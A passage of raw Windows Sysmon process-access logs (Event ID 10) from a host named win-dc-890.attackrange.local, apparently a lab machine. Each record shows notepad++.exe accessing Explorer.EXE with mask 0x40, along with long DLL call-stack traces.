inSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 